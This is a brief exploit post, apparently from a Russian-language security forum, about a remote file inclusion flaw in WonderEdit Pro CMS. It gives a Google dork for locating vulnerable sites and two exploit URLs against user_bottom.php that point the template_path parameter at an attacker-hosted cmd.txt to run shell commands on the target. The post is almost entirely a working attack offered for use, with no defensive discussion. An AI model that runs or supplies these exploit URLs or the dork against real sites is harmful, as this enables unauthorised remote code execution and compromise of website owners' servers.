WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities
Пример/эксплоит:
Google dork: "powered by WonderEdit Pro"
Пример/эксплоит:
Код:
http://[target]/[path]/template/rwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[path]/template/gwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls